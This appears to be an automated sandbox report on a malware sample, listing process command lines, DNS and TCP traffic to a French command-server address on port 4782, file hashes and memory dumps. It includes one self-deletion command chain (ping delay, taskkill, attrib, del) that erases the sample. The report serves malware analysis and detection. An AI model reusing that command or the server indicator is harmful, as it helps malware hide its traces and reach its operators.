C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{68c18e95-fca2-44cf-bdc9-7416bb512836}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{52e53863-69fb-41a0-9e96-acb5f7e0af93}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{329780d6-c194-4c0a-80de-24e0e2477612}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{e3a5a8f2-ba1f-442f-a027-b0df8d9017e5}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{41c108b2-7ae1-4ca1-b47b-dca1fcf112fc}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{2b6b2dc1-4e67-4c1e-b3ca-4565b2a132b3}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 460 -p 5820 -ip 5820

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5820 -s 308

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{9708dcbf-e875-44b8-a5d4-03771b9fcda6}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{675e7367-5393-4afc-a47e-fcf042d536e1}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{f2b2f4c5-7a98-48e6-8b8b-acd2b7293109}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 376 -ip 376

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 376 -s 456

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{eb4d027d-449b-452c-913f-affa67d6daef}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{1519bb58-08e6-4e31-8d8b-b982de74ff3b}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{bc2940b0-c17f-4b9b-a5e6-e8e658f8fdea}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{a5590f11-ab6f-40ee-977a-240faad25fba}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
FR 163.5.215.216:4782 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
FR 163.5.215.216:4782 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/4528-4-0x00007FF81F973000-0x00007FF81F975000-memory.dmp

memory/4528-5-0x0000020124120000-0x0000020124142000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ewlbilj.dmq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4528-15-0x00007FF81F970000-0x00007FF820431000-memory.dmp

memory/4528-16-0x00007FF81F970000-0x00007FF820431000-memory.dmp

memory/4528-17-0x0000020123B30000-0x0000020123B54000-memory.dmp

memory/4528-19-0x00007FF83DE60000-0x00007FF83DF1E000-memory.dmp

memory/4528-18-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp

memory/4528-20-0x000002013D2C0000-0x000002013DD10000-memory.dmp

memory/4528-22-0x00007FF81F970000-0x00007FF820431000-memory.dmp

memory/4528-23-0x000002013CFC0000-0x000002013D066000-memory.dmp

memory/4528-24-0x000002013DD10000-0x000002013DD66000-memory.dmp

memory/4528-25-0x000002013DD70000-0x000002013DDC8000-memory.dmp

memory/4528-26-0x0000020123B60000-0x0000020123B82000-memory.dmp

memory/4528-27-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp

memory/4528-29-0x000002013C230000-0x000002013C23A000-memory.dmp

memory/4268-30-0x0000000140000000-0x0000000140004000-memory.dmp

memory/4268-32-0x0000000140000000-0x0000000140004000-memory.dmp

memory/4528-33-0x00007FF81F973000-0x00007FF81F975000-memory.dmp

memory/3552-34-0x0000000000400000-0x0000000000406000-memory.dmp

memory/3552-36-0x0000000000400000-0x0000000000406000-memory.dmp

memory/4528-37-0x00007FF81F970000-0x00007FF820431000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 0b4340ed812dc82ce636c00fa5c9bef2
SHA1 51c97ebe601ef079b16bcd87af827b0be5283d96
SHA256 dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512 d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

C:\Windows\$sxr-cmd.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

memory/3168-60-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp

memory/3168-61-0x00007FF83DE60000-0x00007FF83DF1E000-memory.dmp

memory/3168-62-0x0000015665180000-0x0000015665704000-memory.dmp

memory/3168-63-0x000001566DBD0000-0x000001566E39A000-memory.dmp

memory/3168-64-0x000001566E3A0000-0x000001566E7DE000-memory.dmp

memory/3168-65-0x000001566E7E0000-0x000001566E892000-memory.dmp

memory/3168-66-0x00000156642A0000-0x00000156642C2000-memory.dmp

memory/3168-67-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp

memory/4528-75-0x00007FF81F970000-0x00007FF820431000-memory.dmp

memory/3168-76-0x00000156660A0000-0x00000156660F0000-memory.dmp

memory/3168-77-0x00000156661B0000-0x0000015666262000-memory.dmp

memory/3168-78-0x0000015666440000-0x0000015666602000-memory.dmp

memory/3168-79-0x00000156660F0000-0x000001566612C000-memory.dmp

memory/3168-80-0x0000015666050000-0x000001566609E000-memory.dmp

memory/4788-84-0x0000000140000000-0x0000000140028000-memory.dmp

memory/4788-87-0x00007FF83DE60000-0x00007FF83DF1E000-memory.dmp

memory/4788-86-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp

memory/4788-85-0x0000000140000000-0x0000000140028000-memory.dmp

memory/3168-83-0x0000015666130000-0x0000015666166000-memory.dmp

memory/3168-82-0x00007FF83DE60000-0x00007FF83DF1E000-memory.dmp

memory/3168-81-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp

memory/4788-88-0x0000000140000000-0x0000000140028000-memory.dmp

memory/616-94-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

memory/392-105-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

memory/1152-125-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

memory/956-127-0x0000027FCEFA0000-0x0000027FCEFC7000-memory.dmp

memory/1152-124-0x00000200F38D0000-0x00000200F38F7000-memory.dmp

memory/1144-122-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

memory/1144-121-0x0000024704B40000-0x0000024704B67000-memory.dmp

memory/1136-119-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

memory/1136-118-0x000001D6D1FA0000-0x000001D6D1FC7000-memory.dmp

memory/1128-116-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

memory/1128-115-0x000001E1007D0000-0x000001E1007F7000-memory.dmp

memory/436-113-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

memory/436-112-0x000002071F7D0000-0x000002071F7F7000-memory.dmp

memory/392-104-0x0000013DF5DC0000-0x0000013DF5DE7000-memory.dmp

memory/1016-101-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

memory/676-99-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

memory/1016-98-0x000001F5B8B30000-0x000001F5B8B57000-memory.dmp

memory/676-93-0x00000290A7490000-0x00000290A74B7000-memory.dmp

memory/616-91-0x000001EA278E0000-0x000001EA27907000-memory.dmp

memory/616-90-0x000001EA278B0000-0x000001EA278D2000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4774.tmp.csv

MD5 e75427096036e766270102ddad04b3e7
SHA1 746ea8d0d1b84a0dd7c250e67f7307348abbbfeb
SHA256 147fe85a518d534c6d5319bf5ebe20c116f152280aeaddd7bbe764cce38e777b
SHA512 ee1568eac456964a620a4c7a46707c87457606457e80d8e47d6cf453fe22fec25a71a02ec94a7eca9ed2827ad0d97148545a426f4f1b39142440775412a807ba

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4794.tmp.txt

MD5 dea8a66faf66ccc405c61edc00bce542
SHA1 c76606dabf5665081f8a3e98830a1605df08e552
SHA256 40c5f0c40e110c031732b494d55a78449e11066eef28537c21f3c48f6f3bead8
SHA512 657bebecedad843c723a5e73f9499f978135836a8c32d24ccdf8ae84d37103ca0b32500650068f8cb2758180938e664e6ff77ad598565f7efe12ae5dec6c6917

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FE2.tmp.csv

MD5 2aa06b36e05bfda6ef341bc41bb46b86
SHA1 2d15b0ecabbc13db2a6f1bda2457f97f8ceedef2
SHA256 4033805b08b1ca41789226649a504b6dd76d9e9578622dd5aa6006ec78d6646b
SHA512 1d50bdf1f4d06ce8e10f36b05ab9a6f3281da26a2589e6006dad3cb4e4e9eb849e9ba152c65497868fb2f9ebd1e3b214bf9ab1587a3fc87ef0e895b29d71200a

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5002.tmp.txt

MD5 cc2e708111bc4491d8f47967d3343bf3
SHA1 816ff84dfe8ad7d275842fb0a9080299b5e8890a
SHA256 099f7186c89c968eb6c3cb635aa913b09f9ec474e664929ff720a20aca584338
SHA512 e1ab58a51f62c924f2b2ef5210a4191ddb60fc0890b0f55646fb05c5dd6c7908d25790136e86f592e18a7c138659858e5cecb5ecbca7f946b41f341e88951c2e

memory/4528-1556-0x00007FF81F970000-0x00007FF820431000-memory.dmp